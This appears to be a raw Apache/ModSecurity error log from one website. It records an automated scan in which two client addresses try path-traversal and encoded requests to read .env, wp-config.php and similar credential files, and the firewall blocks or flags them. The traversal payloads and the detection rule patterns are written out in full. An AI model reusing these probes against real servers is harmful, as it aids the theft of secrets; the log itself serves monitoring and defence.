[Tue May 12 06:16:34.166698 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpohs7kySIUZ3ORnI1UwAAARE"]
[Tue May 12 06:16:34.180672 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.example"] [unique_id "agKpohfeipD4uoG21Fo_5wAAAAI"]
[Tue May 12 06:16:34.180863 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.example"] [unique_id "agKpohfeipD4uoG21Fo_5wAAAAI"]
[Tue May 12 06:16:34.396225 2026] [core:error] [pid 1825179:tid 1825204] [client 45.148.10.166:7144] AH10244: invalid URI path (/css../../../../.env)
[Tue May 12 06:16:34.654095 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpohs7kySIUZ3ORnI1UwAAARE"]
[Tue May 12 06:16:34.658142 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpohfeipD4uoG21Fo_5wAAAAI"]
[Tue May 12 06:16:34.681392 2026] [core:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] AH10244: invalid URI path (/../../.env)
[Tue May 12 06:16:34.683042 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKpohfeipD4uoG21Fo_6gAAAAI"]
[Tue May 12 06:16:34.683234 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKpohfeipD4uoG21Fo_6gAAAAI"]
[Tue May 12 06:16:34.988300 2026] [core:error] [pid 1825287:tid 1825308] [client 45.148.10.238:61902] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 06:16:35.055337 2026] [core:error] [pid 1842385:tid 1842394] [client 45.148.10.238:61992] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 06:16:35.398312 2026] [core:error] [pid 1808852:tid 1808878] [client 45.148.10.238:61968] AH10244: invalid URI path (/../.env)
[Tue May 12 06:16:35.418781 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpo_aAnTZtx1_H_wzGLgAAAUM"]
[Tue May 12 06:16:35.418862 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpo_aAnTZtx1_H_wzGLgAAAUM"]
[Tue May 12 06:16:35.419122 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpo_aAnTZtx1_H_wzGLgAAAUM"]
[Tue May 12 06:16:35.547350 2026] [core:error] [pid 1808852:tid 1808868] [client 45.148.10.238:61974] AH10244: invalid URI path (/static../../../.env)
[Tue May 12 06:16:35.979368 2026] [core:error] [pid 1820198:tid 1820224] [client 45.148.10.238:61976] AH10244: invalid URI path (/static../../../../.env)
[Tue May 12 06:16:36.017973 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpohfeipD4uoG21Fo_6gAAAAI"]
[Tue May 12 06:16:36.045241 2026] [core:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] AH10244: invalid URI path (/../.env)
[Tue May 12 06:16:36.151541 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKppBfeipD4uoG21Fo__AAAAAc"]
[Tue May 12 06:16:36.151749 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKppBfeipD4uoG21Fo__AAAAAc"]
[Tue May 12 06:16:36.732885 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpo_aAnTZtx1_H_wzGLgAAAUM"]
[Tue May 12 06:16:36.768745 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKppPaAnTZtx1_H_wzGQgAAAUM"]
[Tue May 12 06:16:36.768824 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKppPaAnTZtx1_H_wzGQgAAAUM"]
[Tue May 12 06:16:36.769008 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKppPaAnTZtx1_H_wzGQgAAAUM"]
[Tue May 12 06:16:37.087809 2026] [core:error] [pid 1842385:tid 1842398] [client 45.148.10.238:62002] AH10244: invalid URI path (/assets../../../.env)
[Tue May 12 06:16:37.135318 2026] [core:error] [pid 1825287:tid 1825326] [client 45.148.10.238:61908] AH10244: invalid URI path (/assets../../../../.env)
[Tue May 12 06:16:37.188552 2026] [core:error] [pid 1825179:tid 1825207] [client 45.148.10.166:7162] AH10244: invalid URI path (/.%00/../../.env)
[Tue May 12 06:16:37.271263 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKppBfeipD4uoG21Fo__AAAAAc"]
[Tue May 12 06:16:37.491845 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKppRfeipD4uoG21FpACAAAAAc"]
[Tue May 12 06:16:37.492066 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKppRfeipD4uoG21FpACAAAAAc"]
[Tue May 12 06:16:37.692309 2026] [core:error] [pid 1844863:tid 1844875] [client 45.148.10.238:62040] AH10244: invalid URI path (/css../../../.env)
[Tue May 12 06:16:37.697790 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKppPaAnTZtx1_H_wzGQgAAAUM"]
[Tue May 12 06:16:37.727938 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKppfaAnTZtx1_H_wzGUAAAAUM"]
[Tue May 12 06:16:37.728014 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKppfaAnTZtx1_H_wzGUAAAAUM"]
[Tue May 12 06:16:37.728185 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKppfaAnTZtx1_H_wzGUAAAAUM"]
[Tue May 12 06:16:37.740098 2026] [core:error] [pid 1820198:tid 1820218] [client 45.148.10.238:61916] AH10244: invalid URI path (/css../../../../.env)
[Tue May 12 06:16:37.985854 2026] [core:error] [pid 1820198:tid 1820219] [client 45.148.10.238:61998] AH10244: invalid URI path (/../../.env)
[Tue May 12 06:16:38.077832 2026] [core:error] [pid 1808852:tid 1808863] [client 45.148.10.238:61940] AH10244: invalid URI path (/../.env)
[Tue May 12 06:16:38.440611 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKppRfeipD4uoG21FpACAAAAAc"]
[Tue May 12 06:16:38.466403 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/public/.env"] [unique_id "agKpphfeipD4uoG21FpAEwAAAAc"]
[Tue May 12 06:16:38.466612 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/public/.env"] [unique_id "agKpphfeipD4uoG21FpAEwAAAAc"]
[Tue May 12 06:16:38.652218 2026] [core:error] [pid 1808852:tid 1808876] [client 45.148.10.238:62108] AH10244: invalid URI path (/.%00/../../.env)
[Tue May 12 06:16:38.680233 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKppfaAnTZtx1_H_wzGUAAAAUM"]
[Tue May 12 06:16:38.988837 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKppvaAnTZtx1_H_wzGUgAAAUM"]
[Tue May 12 06:16:38.989063 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.166:7146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKppvaAnTZtx1_H_wzGUgAAAUM"]
[Tue May 12 06:16:39.227272 2026] [core:error] [pid 1825287:tid 1825328] [client 45.148.10.238:62132] AH10244: invalid URI path (/js../../../.env)
[Tue May 12 06:16:39.608506 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpphfeipD4uoG21FpAEwAAAAc"]
[Tue May 12 06:16:39.619455 2026] [core:error] [pid 1820198:tid 1820210] [client 45.148.10.238:62168] AH10244: invalid URI path (/js../../../../.env)
[Tue May 12 06:16:39.638648 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKppxfeipD4uoG21FpAFgAAAAc"]
[Tue May 12 06:16:39.638873 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKppxfeipD4uoG21FpAFgAAAAc"]
